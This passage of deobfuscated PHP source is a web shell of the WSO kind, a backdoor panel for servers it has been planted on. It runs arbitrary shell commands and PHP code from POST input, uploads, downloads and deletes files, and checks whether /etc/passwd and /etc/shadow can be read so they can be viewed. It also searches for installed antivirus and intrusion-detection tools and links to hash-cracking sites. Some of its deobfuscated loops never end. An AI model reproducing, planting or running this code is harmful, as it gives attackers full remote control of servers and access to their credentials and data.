$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach (range('c', 'z') as $drive) {
if (is_dir($drive . ':\\')) {
$drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
}
}
}
echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . FkLptViewSize($totalSpace) . ' <span>Free:</span> ' . FkLptViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . FkLptPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
// [PHPDeobfuscator] Implied return
return;
}
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
$j = 0;
df755:
if (!($j <= $i)) {
$cwd_links .= "\")'>" . $path[$i] . "/</a>";
$i++;
goto c2d57;
}
$cwd_links .= $path[$j] . '/';
$j++;
goto df755;
}
function FkLptFooter()
{
$is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\r\n\t<tr>\r\n\t\t<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>\r\n\t\t<td><form method='post' ENCTYPE='multipart/form-data'>\r\n\t\t<input type=hidden name=a value='FilesMAn'>\r\n\t\t<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>\r\n\t\t<input type=hidden name=p1 value='uploadFile'>\r\n\t\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t\t<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>\r\n\t</tr></table></div></body></html>";
}
if (!function_exists("posix_getpwuid") && strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) {
function posix_getpwuid($p)
{
return false;
}
}
if (!function_exists("posix_getgrgid") && strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) {
function posix_getgrgid($p)
{
return false;
}
}
function FkLptEx($in)
{
$out = '';
if (function_exists('exec')) {
@exec($in, $out);
$out = @join("\n", $out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, "r"))) {
$out = "";
Eac36:
if (@feof($f)) {
pclose($f);
}
$out .= fread($f, 1024);
goto Eac36;
}
return $out;
}
function FkLptViewSize($s)
{
if (is_int($s)) {
$s = sprintf("%u", $s);
}
if ($s >= 1073741824) {
return sprintf('%1.2f', $s / 1073741824) . ' GB';
} elseif ($s >= 1048576) {
return sprintf('%1.2f', $s / 1048576) . ' MB';
} elseif ($s >= 1024) {
return sprintf('%1.2f', $s / 1024) . ' KB';
} else {
return $s . ' B';
}
}
function FkLptPerms($p)
{
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x100 ? 'r' : '-';
$i .= $p & 0x80 ? 'w' : '-';
$i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
$i .= $p & 0x20 ? 'r' : '-';
$i .= $p & 0x10 ? 'w' : '-';
$i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
$i .= $p & 0x4 ? 'r' : '-';
$i .= $p & 0x2 ? 'w' : '-';
$i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
return $i;
}
function FkLptPermsColor($f)
{
if (!@is_readable($f)) {
return '<font color=#FF0000>' . FkLptPerms(@fileperms($f)) . '</font>';
} elseif (!@is_writable($f)) {
return '<font color=white>' . FkLptPerms(@fileperms($f)) . '</font>';
} else {
return '<font color=#25ff00>' . FkLptPerms(@fileperms($f)) . '</font>';
}
}
function FkLptScandir($dir)
{
if (function_exists("scandir")) {
return scandir($dir);
} else {
$dh = opendir($dir);
Fbe52:
if (!(false !== ($filename = readdir($dh)))) {
return $files;
}
$files[] = $filename;
goto Fbe52;
}
}
function FkLptWhich($p)
{
$path = FkLptEx('which ' . $p);
if (!empty($path)) {
return $path;
}
return false;
}
function actionSecInfo()
{
FkLptHeader();
echo "<h1>Server security information</h1><div class=content>";
function FkLptSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo '<span>' . $n . ': </span>';
if (strpos($v, "\n") === false) {
echo $v . '<br>';
} else {
echo '<pre class=ml1>' . $v . '</pre>';
}
}
}
FkLptSecParam('Server software', @getenv('SERVER_SOFTWARE'));
if (function_exists('apache_get_modules')) {
FkLptSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
}
FkLptSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
FkLptSecParam('Open base dir', @ini_get('open_basedir'));
FkLptSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
FkLptSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
FkLptSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
$temp = array();
if (function_exists('mysql_get_client_info')) {
$temp[] = "MySql (" . mysql_get_client_info() . ")";
}
if (function_exists('mssql_connect')) {
$temp[] = "MSSQL";
}
if (function_exists('pg_connect')) {
$temp[] = "PostgreSQL";
}
if (function_exists('oci_connect')) {
$temp[] = "Oracle";
}
FkLptSecParam('Supported databases', implode(', ', $temp));
echo "<br>";
if ($GLOBALS['os'] == 'nix') {
FkLptSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
FkLptSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no');
FkLptSecParam('OS version', @file_get_contents('/proc/version'));
FkLptSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if (!$GLOBALS['safe_mode']) {
$userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
$danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
$downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
echo "<br>";
$temp = array();
foreach ($userful as $item) {
if (FkLptWhich($item)) {
$temp[] = $item;
}
}
FkLptSecParam('Userful', implode(', ', $temp));
$temp = array();
foreach ($danger as $item) {
if (FkLptWhich($item)) {
$temp[] = $item;
}
}
FkLptSecParam('Danger', implode(', ', $temp));
$temp = array();
foreach ($downloaders as $item) {
if (FkLptWhich($item)) {
$temp[] = $item;
}
}
FkLptSecParam('Downloaders', implode(', ', $temp));
echo "<br/>";
FkLptSecParam('HDD space', FkLptEx('df -h'));
FkLptSecParam('Hosts', @file_get_contents('/etc/hosts'));
echo "<br/><span>posix_getpwuid (\"Read\" /etc/passwd)</span><table><form onsubmit='g(null,null,\"5\",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=\">>\"></form>";
if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
$temp = "";
Ee3d1:
if (!($_POST['p2'] <= $_POST['p3'])) {
echo "<br/>";
FkLptSecParam('Users', $temp);
}
$uid = @posix_getpwuid($_POST['p2']);
if ($uid) {
$temp .= join(':', $uid) . "\n";
}
$_POST['p2']++;
goto Ee3d1;
}
}
} else {
FkLptSecParam('OS Version', FkLptEx('ver'));
FkLptSecParam('Account Settings', FkLptEx('net accounts'));
FkLptSecParam('User Accounts', FkLptEx('net user'));
}
echo "</div>";
FkLptFooter();
}
function actionPhp()
{
if (isset($_POST['ajax'])) {
FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
eval($_POST['p1']);
$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
echo strlen($temp), "\n", $temp;
exit;
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
}
FkLptHeader();
if (isset($_POST['p2']) && $_POST['p2'] == 'info') {
echo "<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>";
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace(array('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), $tmp);
echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
}
echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">';
echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
if (!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo "</pre></div>";
FkLptFooter();
}
function actionFilesMan()
{
if (!empty($_COOKIE['f'])) {
$_COOKIE['f'] = @unserialize($_COOKIE['f']);
}
if (!empty($_POST['p1'])) {
switch ($_POST['p1']) {
case 'uploadFile':
if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) {
echo "Can't upload file!";
}
goto D5709;
case 'mkdir':
if (!@mkdir($_POST['p2'])) {
echo "Can't create new dir";
}
goto D5709;
case 'delete':
function deleteDir($path)
{
$path = substr($path, -1) == '/' ? $path : $path . '/';
$dh = opendir($path);
F37a1:
if (!(($item = readdir($dh)) !== false)) {
closedir($dh);
@rmdir($path);
// [PHPDeobfuscator] Implied return
return;
}
$item = $path . $item;
if (basename($item) == ".." || basename($item) == ".") {
goto F37a1;
}
$type = filetype($item);
if ($type == "dir") {
deleteDir($item);
} else {
@unlink($item);
}
goto F37a1;
}
if (is_array(@$_POST['f'])) {
foreach ($_POST['f'] as $f) {
if ($f == '..') {
goto c0e52;
}
$f = urldecode($f);
if (is_dir($f)) {
deleteDir($f);
} else {
@unlink($f);
}
c0e52:
}
}
goto D5709;
case 'paste':
if ($_COOKIE['act'] == 'copy') {
function copy_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = @opendir($c . $s);
Fa556:
if (!(($f = @readdir($h)) !== false)) {
}
if ($f != "." and $f != "..") {
copy_paste($c . $s . '/', $f, $d . $s . '/');
}
goto Fa556;
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE['f'] as $f) {
copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);
}
} elseif ($_COOKIE['act'] == 'move') {
function move_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = @opendir($c . $s);
A4f27:
if (!(($f = @readdir($h)) !== false)) {
}
if ($f != "." and $f != "..") {
copy_paste($c . $s . '/', $f, $d . $s . '/');
}
goto A4f27;
} elseif (@is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE['f'] as $f) {
@rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f);
}
} elseif ($_COOKIE['act'] == 'zip') {
if (class_exists('ZipArchive')) {
$zip = new ZipArchive();
if ($zip->open($_POST['p2'], 1)) {
chdir($_COOKIE['c']);
foreach ($_COOKIE['f'] as $f) {
if ($f == '..') {
goto c294a;
}
if (@is_file($_COOKIE['c'] . $f)) {
$zip->addFile($_COOKIE['c'] . $f, $f);
} elseif (@is_dir($_COOKIE['c'] . $f)) {
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS));
foreach ($iterator as $key => $value) {
$zip->addFile(realpath($key), $key);
}
}
c294a:
}
chdir($GLOBALS['cwd']);
$zip->close();
}
}
} elseif ($_COOKIE['act'] == 'unzip') {
if (class_exists('ZipArchive')) {
$zip = new ZipArchive();
foreach ($_COOKIE['f'] as $f) {
if ($zip->open($_COOKIE['c'] . $f)) {
$zip->extractTo($GLOBALS['cwd']);
$zip->close();
}
}
}
} elseif ($_COOKIE['act'] == 'tar') {
chdir($_COOKIE['c']);
$_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
FkLptEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
chdir($GLOBALS['cwd']);
}
unset($_COOKIE['f']);
setcookie('f', '', time() - 3600);
goto D5709;
default:
if (!empty($_POST['p1'])) {
FkLptsetcookie('act', $_POST['p1']);
FkLptsetcookie('f', serialize(@$_POST['f']));
FkLptsetcookie('c', @$_POST['c']);
}
goto D5709;
}
D5709:
}
FkLptHeader();
echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_=\"\";</script>";
$dirContent = FkLptScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
if ($dirContent === false) {
echo "Can't open this folder!";
FkLptFooter();
return;
}
global $sort;
$sort = array('name', 1);
if (!empty($_POST['p1'])) {
if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) {
$sort = array($match[1], (int) $match[2]);
}
}
echo "<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == 'checkbox')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width='100%' class='main' cellspacing='0' cellpadding='2'>\r\n<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = array();
$n = count($dirContent);
$i = 0;
b3860:
if (!($i < $n)) {
$GLOBALS['sort'] = $sort;
function FkLptCmp($a, $b)
{
if ($GLOBALS['sort'][0] != 'size') {
return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
} else {
return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
}
}
usort($files, "FkLptCmp");
usort($dirs, "FkLptCmp");
$files = array_merge($dirs, $files);
$l = 0;
foreach ($files as $f) {
echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? FkLptViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
$l = $l ? 0 : 1;
}
echo "<tr><td colspan=7>\r\n\t<input type=hidden name=a value='FilesMan'>\r\n\t<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>\r\n\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
if (class_exists('ZipArchive')) {
echo "<option value='zip'>Compress (zip)</option><option value='unzip' selected>Uncompress (unzip)</option>";
}
echo "<option value='tar'>Compress (tar.gz)</option>";
if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) {
echo "<option value='paste'>Paste / Compress</option>";
}
echo "</select> ";
if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && ($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')) {
echo "file name: <input type=text name=p2 value='FkLpt_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> ";
}
echo "<input type='submit' value='>>'></td></tr></form></table></div>";
FkLptFooter();
// [PHPDeobfuscator] Implied return
return;
}
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => FkLptPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]));
if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) {
$files[] = array_merge($tmp, array('type' => 'file'));
} elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) {
$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
} elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) {
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$i++;
goto b3860;
}
function actionStringTools()
{
if (!function_exists('hex2bin')) {
function hex2bin($p)
{
return decbin(hexdec($p));
}
}
if (!function_exists('binhex')) {
function binhex($p)
{
return dechex(bindec($p));
}
}
if (!function_exists('hex2ascii')) {
function hex2ascii($p)
{
$r = '';
$i = 0;
Aa837:
if (!($i < strLen($p))) {
return $r;
}
$r .= chr(hexdec($p[$i] . $p[$i + 1]));
$i += 2;
goto Aa837;
}
}
if (!function_exists('ascii2hex')) {
function ascii2hex($p)
{
$r = '';
$i = 0;
F9485:
if (!($i < strlen($p))) {
return "";
}
$r .= sprintf('%02X', ord($p[$i]));
++$i;
goto F9485;
}
}
if (!function_exists('full_urlencode')) {
function full_urlencode($p)
{
$r = '';
$i = 0;
Cf13b:
if (!($i < strlen($p))) {
return "";
}
$r .= '%' . dechex(ord($p[$i]));
++$i;
goto Cf13b;
}
}
$stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen');
if (isset($_POST['ajax'])) {
FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
if (in_array($_POST['p1'], $stringTools)) {
echo $_POST['p1']($_POST['p2']);
}
$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
echo strlen($temp), "\n", $temp;
exit;
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
}
FkLptHeader();
echo "<h1>String conversions</h1><div class=content>";
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
foreach ($stringTools as $k => $v) {
echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>";
}
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>";
if (!empty($_POST['p1'])) {
if (in_array($_POST['p1'], $stringTools)) {
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
}
echo "</pre></div><br><h1>Search files:</h1><div class=content>\r\n\t\t<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>\r\n\t\t\t<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\r\n\t\t\t<tr><td></td><td><input type='submit' value='>>'></td></tr>\r\n\t\t\t</table></form>";
function FkLptRecursiveGlob($path)
{
if (substr($path, -1) != '/') {
$path .= '/';
}
$paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR)));
if (is_array($paths) && @count($paths)) {
foreach ($paths as $item) {
if (@is_dir($item)) {
if ($path != $item) {
FkLptRecursiveGlob($item);
}
} else {
if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) {
echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>";
}
}
}
}
}
if (@$_POST['p3']) {
FkLptRecursiveGlob($_POST['c']);
}
echo "</div><br><h1>Search for hash:</h1><div class=content>\r\n\t\t<form method='post' target='_blank' name='hf'>\r\n\t\t\t<input type='text' name='hash' style='width:200px;'><br>\r\n <input type='hidden' name='act' value='find'/>\r\n\t\t\t<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>\r\n\t\t\t<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>\r\n <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>\r\n\t\t</form></div>";
FkLptFooter();
}
function actionFilesTools()
{
if (isset($_POST['p1'])) {
$_POST['p1'] = urldecode($_POST['p1']);
}
if (@$_POST['p2'] == 'download') {
if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; \r\nfilename=" . basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: " . $type);
} else {
header("Content-Type: application/octet-stream");
}
$fp = @fopen($_POST['p1'], "r");
if ($fp) {
A8d16:
if (@feof($fp)) {
fclose($fp);
}
echo @fread($fp, 1024);
goto A8d16;
}
}
exit;
}
if (@$_POST['p2'] == 'mkfile') {
if (!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if ($fp) {
$_POST['p2'] = "edit";
fclose($fp);
}
}
}
FkLptHeader();
echo "<h1>File tools</h1><div class=content>";
if (!file_exists(@$_POST['p1'])) {
echo "File not exists";
FkLptFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
if (!$uid) {
$uid['name'] = @fileowner($_POST['p1']);
$gid['name'] = @filegroup($_POST['p1']);
} else {
$gid = @posix_getgrgid(@filegroup($_POST['p1']));
}
echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? FkLptViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . FkLptPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>';
if (empty($_POST['p2'])) {
$_POST['p2'] = 'view';
}
if (is_file($_POST['p1'])) {
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
} else {
$m = array('Chmod', 'Rename', 'Touch');
}
foreach ($m as $v) {
echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
}
echo "<br><br>";
switch ($_POST['p2']) {
case 'view':
echo "<pre class=ml1>";
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
e8177:
if (@feof($fp)) {
@fclose($fp);
}
echo htmlspecialchars(@fread($fp, 1024));
goto e8177;
}
echo "</pre>";
goto F5018;
case 'highlight':
if (@is_readable($_POST['p1'])) {
echo "<div class=ml1 style=\"background-color: #e1e1e1;color:black;\">";
$code = @highlight_file($_POST['p1'], true);
